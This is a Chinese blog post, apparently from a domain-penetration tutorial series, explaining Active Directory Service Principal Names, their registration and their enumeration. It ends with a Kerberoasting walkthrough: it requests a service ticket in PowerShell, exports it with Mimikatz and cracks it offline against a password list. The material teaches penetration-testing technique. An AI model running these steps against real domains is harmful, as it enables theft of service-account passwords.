服务主体名称SPN

最新推荐文章于 2024-04-18 12:15:00 发布
最新推荐文章于 2024-04-18 12:15:00 发布
阅读量1.2k 收藏 19
点赞数 19
分类专栏: 域渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_65550121/article/details/134884390
版权

在这里插入图片描述

SPN是什么?

在我们了解SPN之前,我们需要去了解一下Active Directory域中的服务概念是什么。

服务实际上是一种功能,一种软件,可以被域内成员使用的东西,例如Web服务,网络共享服务,DNS服务,打印服务等等。

这些都是服务的概念。

那么同一个服务可以在不同主机下运行,例如打印服务,他并不是专属于这一个主机的,它可以应用于多个主机,给多个主机提供打印文件的服务,所以我们需要指定主机,而一台计算机可以承载多个服务,所以我们需要指定服务。这样的话,我们就可以准确的指定服务给那台计算机服务。

这两个合起来就是服务主体名称或者也可以叫做SPN。

例如:

服务类/主机名或者域名

服务类实际上是服务的一个通用名称,例如所有的Web服务都归于www类,SQL服务可以归为SqlServer类。

如果服务在自定义端口上面运行,你可以将这个端口加到主机名后面。

服务类/主机名或者域名:端口

或者也可以命名SPN。

如果我想在上面指定一个Web服务:WEB-SERVER-01 SPN如下:

这里的www就是服务类。

www/WEB-SERVER-01

要么就是

www/WEB-SERVER-01.relaysec.com

如下是Kerberos票据中服务的SPN。

这个票据表示有人在域内请求dc.relaysec.com的cifs服务后创建的。
在这里插入图片描述
有大量的服务类,这里是Microsoft 文档中内置的一个列表。

这里服务类中有例如CIFS与文件共享的服务,DNS 域名解析服务,spooler打印服务等等,但是这里面并不详细,例如没有SQLserver或者Ldap目录服务类。这些类通常可以在AD环境中找到。
在这里插入图片描述
在AD域中的对象SPN属性有一种特殊的情况,它是HoST SPN。
在这里插入图片描述

因此如果用户在AD域上不仅会查找www/USER-WIN7,也会查找Host/USER-WIN7,如果主机有Host SPN,那么也一位着它也有www SPN。

SPN分为两种类型:

一种是注册在活动目录的机器帐户(Computers)下,当一个服务的权限为 Local System 或 Network Service,则SPN注册在机器帐户(Computers)下。

.一种是注册在活动目录的域用户帐户(Users)下,当一个服务的权限为一个域用户,则SPN注册在域用户帐户(Users)下。

在Windows域里,默认普通机器账号有权注册SPN:

setspn -A MSSQLSvc/user-win7.relaysec.com user-win7

在这里插入图片描述
在user-win7这台机器上的servicePrincipalNames属性查看。
在这里插入图片描述可以看到已经注册进来了。

但是普通域用户是不能注册SPN的。

在这里插入图片描述
可以看到hack这个用户的权限是不够的。

这样就会导致一个问题,如果SqlServer使用 Local SysTem account来启动的话,kerberos就能认证成功,这时候就可以在DC上注册SPN,如果用一个普通用户的话,kerberos就不能成功,因为这时候SPN注册不上去。那么为了解决这个问题,我们可以在DC上赋予域账号Read servicePrincipalName和Write serverPrincipalName的权限,在ACL中添加ACE即可。

注意这里不是通过活动目录查找的,这里需要通过ADSI编辑器,然后右击连接,默认即可。
在这里插入图片描述
然后将下面红框中的选项勾选即可。这里选择主体 SELF。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到现在就可以注册了。
在这里插入图片描述

查找域内存在的SPN

使用过滤器进行查找(servicePrincipalName=*),也就是servicePrincipalName属性,也可以使用setSpn。
在这里插入图片描述

使用Setspn
Setspn -Q */*

在这里插入图片描述

使用powershell
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(servicePrincipalName=*)"
$results = $search.Findall()foreach($result in $results) {
$userEntry = $result.GetDirectoryEntry()
Write-host "Object : " $userEntry.name "(" $userEntry.distinguishedName ")"
Write-host "List SPN :"    
foreach($SPN in $userEntry.servicePrincipalName)
{
Write-Host $SPN
}
Write-host ""}

在这里插入图片描述
如果我们想查看具体一个或者多个的SPN用户账户。

$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()foreach($result in $results){
$userEntry = $result.GetDirectoryEntry()
Write-host "User : " $userEntry.name "(" $userEntry.distinguishedName ")"
Write-host "SPNs"
foreach($SPN in $userEntry.servicePrincipalName)
{
$SPN
}
Write-host ""}

kerberoasting攻击

kerberoastring攻击是出在TGS_REP阶段的,由于ST服务票据是使用服务的Hash进行加密的,所以如果我们能获取到ST服务票据,就可以对该ST服务票据进行暴力破解,得到服务的Hash,在TGS_REP这一阶段并不会验证客户端是否有权限访问服务端,因此这一步无论用户也没有访问服务的权限,只要TGT正确,都会返回ST服务票据,这也就是kerberoasting能利用的原因,任何一个域内用户都是去请求任何一个服务的ST服务票据。

攻击流程

1.攻击者提供一个正常的域用户密码进行认证,获得TGT

2.攻击者使用该TGT请求针对指定SPN的ST

3.KDC在验证身份后,返回服务Hash加密的ST,不管提供的域用户有没有对指定SPN服务的访问权限

4.攻击者本地离线爆破ST,获得SPN所链接账户的明文密码( 重点是密码字典

请求SPN
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "mssql/user-win7.relaysec.com"

在这里插入图片描述
导出票据

kerberos::list /export

在这里插入图片描述

破解票据
python3 tgsrepcrack.py pass.txt "2-40a10000-w10a$@MSSQLSvc~sqlsrv.test.com~1433-TEST.COM.kirbi"

如果得到的是一个有权注册SPN的域账号,也可以通过手动注册的方式来进行Kerberoasting攻击。

域渗透之SPN服务主体名称
谢公子的博客
01-21 2664
目录 SPN SPN的配置 SetSPN 注册SPN 查询SPN SPN的扫描 PowerShell-AD-Recon GetUserSPNs.ps1 GetUserSPNs.vbs PowerView.ps1 PowerShellery SPN SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)的...
内网安全之:域环境中的 SPN
f_carey的博客
12-01 5203
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 域环境中的 SPN1 SPN 简介1.1 SPN分类2 SPN 扫描2.1 SPN 命令格式2.2 SPN 查询2.3 Powershell 下的 SPN 扫描3 SPN 扫描和破解TGS Tickets3.1 注册 SPN3.2 请求 SPN Kerberos 票据3.3 导出 SPN Kerberos 票据.
Server 2012 R2故障转移群集提示“没有服务主体名称SPN)”
The 44th Demilitarized Zone
01-05 1710
用两台2012 R2系统的AD DS角色服务器做故障转移集群,测试时提示“没有服务主体名称SPN)”“MSServerClusterMgmtAPI”等错误信息。原因是自Server 2012开始,就不支持在AD DS角色的服务器上安装故障转移集群。 也就是说,做故障转移集群配置,至少要有一台独立的AD DS角色服务器才可以。 具体参考下面的连接。 https://support.m
配置SPN实现AD帐号委托(活动目录)
dengyouying121121的博客
10-27 651
If you cannot see the Delegation tab, do one or both of thefollowing: Register a Service Principal Name (SPN) for the useraccount with the Setspn utility in the support tools on your CD.Deleg...
微软账户官方服务名称是什么,如何为报表服务器注册服务主体名称 (SPN)
weixin_42469083的博客
08-09 582
语法使用 SetSPN 实用工具为报表服务器创建 SPN 的命令语法类似如下所示:Setspn -a http/.: SetSPN 随 Windows Server 2003 Service Pack 1 支持工具包提供,该工具包必须单独下载。-a 参数用于使用特定帐户注册服务主体名称。HTTP 为服务类。报表服务器 Web 服务在 HTTP.SYS 中运行。在为 HTTP 创建 SPN 时,将同...
AD域相关名词介绍
m0_50627257的博客
03-11 2982
AD域 概念 Active Directory域内的directory database 〈目录数据库 〉被用来存储用户账户、 计算机账户、打印机与其事文件夹等对象, 而提供目录服务的组件就是Active Directory域服务(Active Directory Domain Services, AD DS), 它负责目录数据库的存储、 新建、 删除、 修改与查询等工作。 名称空间 一块界定好的区域,在此区域内,可以利用某个名称来找到和这个名称有关的信息 (namespace) 对象(obje
SPN(Service Principal Names)
whojoe的博客
05-24 3284
SPN(Service Principal Names)SPN注册SPNSPN查询setspn.exePowerShell-AD-ReconGetUserSPNSPowerView.ps1利用参考文章 SPN 服务主体名称(Service Principal Names)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。Kerberos身份验证使用SPN服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例,则每个实例都必须具有自己的SPNSPN分为两种
kerberom:Kerberom是一种工具,旨在检索Active Directory中具有服务主体名称SPN)的帐户的ARC4-HMAC加密的票证授予服务(TGS)
05-18
Kerberom是一种工具,旨在检索Active Directory中具有服务主体名称SPN)的帐户的ARC4-HMAC加密的票证授予服务(TGS)。 这些票证以John The Ripper出血-巨型( )和hashcat( )支持的格式存储。 破解这些票证...
为 SQL Server 站点数据库服务器配置 SPN
黄森林
06-25 3043
如何为 SQL Server 站点数据库服务器配置 SPN主题上次更新时间 – 2008 年 1 月使用 SQL Server 计算机的本地系统帐户运行 SQL Server 服务不是 SQL Server 最佳方案。为了最安全地运行 SQL Server 站点数据库服务器,应该配置一个低权限的域用户帐户来运行 SQL Server 服务。必须为 SQL Server 服务帐户
SPN扫描–无需网络端口扫描的进行信息收集
Ping_Pig的博客
08-26 1707
目录 讲在前面 简介SPN的知识点: SPN命名实例 SPN默认实例 部分查询SPN脚本 windows自带setspn.exe,部分命令如下: GetUserSPNs.ps1 GetUserSPNs.vbs PowerView.ps1 总结: 讲在前面 在Active Directory环境中发现服务的最佳方法是通过所谓的“ SPN扫描”。攻击者进行SPN扫描的主要好处是,SPN扫描不需要连接到域内网络上的每个IP即可检查服务端口。SPN扫描通过对域控制器的LDAP查询执行服务发现
内网渗透:详解kerberoast攻击
xnxqwzy的博客
08-21 174
首先再来回顾一下Kerberoast协议的认证过程。kerberoast认证过程算上PAC可以说有四个个阶段。如下图所示[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HERiyPvB-1692505854066)(https://image.3001.net/images/20230707/1688740766_64a8239e0b73a60776256.png!small?下面这张图总结了每个阶段可能出现的安全问题。
SPN的相关利用(上)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
04-18 401
服务主体名称(SPN)是服务实例,可以理解为一个服务,比如mssql,http等等的唯一标识符。如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPN,Kerberos 身份验证使用 SPN服务实例与服务登录帐户相关联。
dbnetlib sqlserver不存在或拒绝访问_【深度分析】关于SPN不正确导致SQL数据库连接失败...
weixin_39808877的博客
11-04 820
连接SQL Server数据库时发生报错“The target principal name is incorrect. Cannot generate SSPI context”,无法连接,可能是由于AD域中记录了错误的SPN,导致无法进行身份验证而连接失败。下文通过简述Kerberos认证过程、SPN的组成,引出由SPN错误引发报错的解决方法。Kerberos认证1. Kerberos认证步...
AD域渗透测试笔记
渗透测试研究中心
12-16 5312
0X00域渗透-Kerberos 1.Kerberos简介 在Kerberos认证中,最主要的问题是如何证明“你是你”的问题,如当一个Client去访问Server服务器上的某服务时,Server如何判断Client是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是Kerberos解决的问题。在域渗透过程中Kerberos协议的攻防也是很重要的存在。 2.Kerberos协议框架 在Kerberos协议中主要是有三个角色的存在: 访问服..
内网-域横向 CobaltStrike&SPN&RDP
mingyqf的博客
11-14 955
域横向 CobaltStrike&SPN&RDP 本课重点: 案例1:域横向移动RDP传递-Mimikatz 案例2:域横向移动SPN服务-探针,请求,导出,破解,重写 案例3:域横向移动测试流程一把梭哈-CobaltStrike初体验 案例1-域横向移动RDP传递-Mimikatz 除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。 RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断 RDP明
AD运维操作
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
10-16 1642
场景 在桌面环境中,AD长作为统一管理和认真的工具,因此对AD的维护和管理就非常重要,本文此处整理记录下AD操作指令 操作 1)AD组策略验证和更新:gpupdate /force 2)AD组策略 ...
SPN(Service Principal name)服务主体名称
lionzl的专栏
01-04 3610
SPN(Service Principal name)服务主体名称SPN服务在使用 Kerberos 身份验证的网络上的唯一标识符。它由服务类、主机名和端口组成。在使用 Kerberos 身份验证的网络中,必须在内置计算机帐户(如 NetworkService 或 LocalSystem)或用户帐户下为服务器注册 SPN。对于内置帐户,SPN 将自动进行注册。但是,如果在域用户帐户下
内网安全:Kerberoasting攻击和SPN服务
god_Zeo的安全博客
05-27 2038
0x01 SPN SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)的唯一标识符。 SPN服务器上所运行服务的唯一标识,每个使用Kerberos的服务都需要一个SPN Kerberos认证过程使用SPN服务实例与服务登录账户相关联,如果想使用 Kerberos 协议来认证服务,那么必须正确配置SPN。如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPN SPN分为两种,一种注册在AD上机器帐户(Compu
SPN配置
最新发布
03-08
### SPN (Service Principal Name) 配置教程和最佳实践 #### 什么是SPN服务主体名称(SPN)用于唯一标识活动目录中的某个特定服务实例。当客户机请求访问该服务时,会通过Kerberos协议使用此名称来获取适当的服务票据[^1]。 #### 如何创建并管理SPN? 为了确保域环境中各服务能够被正确定位与认证,在Active Directory中设置正确的SPNs至关重要: - **注册新的AD用户账户**:作为准备工作的第一步,需先建立专门用来运行某项服务的账号。 - **设定SPN条目**:利用`setspn`命令行工具向指定对象添加对应的SPN记录。例如要为名为sqlsvc的计算机上的MSSQLSvc/sqlserver.example.com:1433这样的SQL Server实例关联一个已存在的domain\serviceaccount,则应执行如下指令: ```powershell setspn -A MSSQLSvc/sqlserver.example.com:1433 domain\serviceaccount ``` - **验证现有配置**:可以通过同样的工具查询当前系统中存在的所有SPN定义情况,以便确认操作无误或是排查潜在冲突问题: ```powershell setspn -L domain\serviceaccount ``` 对于Azure环境下的资源而言,也可以借助CLI完成类似的任务,比如创建一个新的应用程序服务主体及其相关权限授予过程可以这样实现[^2]: ```bash az ad sp create-for-rbac -n "http://mySP" --sdk-auth ``` #### 安全性和合规性的考量 考虑到安全性因素,建议遵循以下几点指导原则: - 尽量减少具有高特权的身份数量; - 对敏感数据和服务实施严格的访问控制措施; - 使用强密码策略保护涉及的关键实体; - 定期审查及更新授权列表以移除不再必要的链接关系; - 启用审计日志功能跟踪任何可疑行为模式[^3]。 此外需要注意的是,在某些特殊场景下(如远程桌面连接),即便启用了严格的安全检查机制,只要正确设置了SPN并且客户端支持相应选项的话,仍然允许正常通信发生而不受阻碍[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值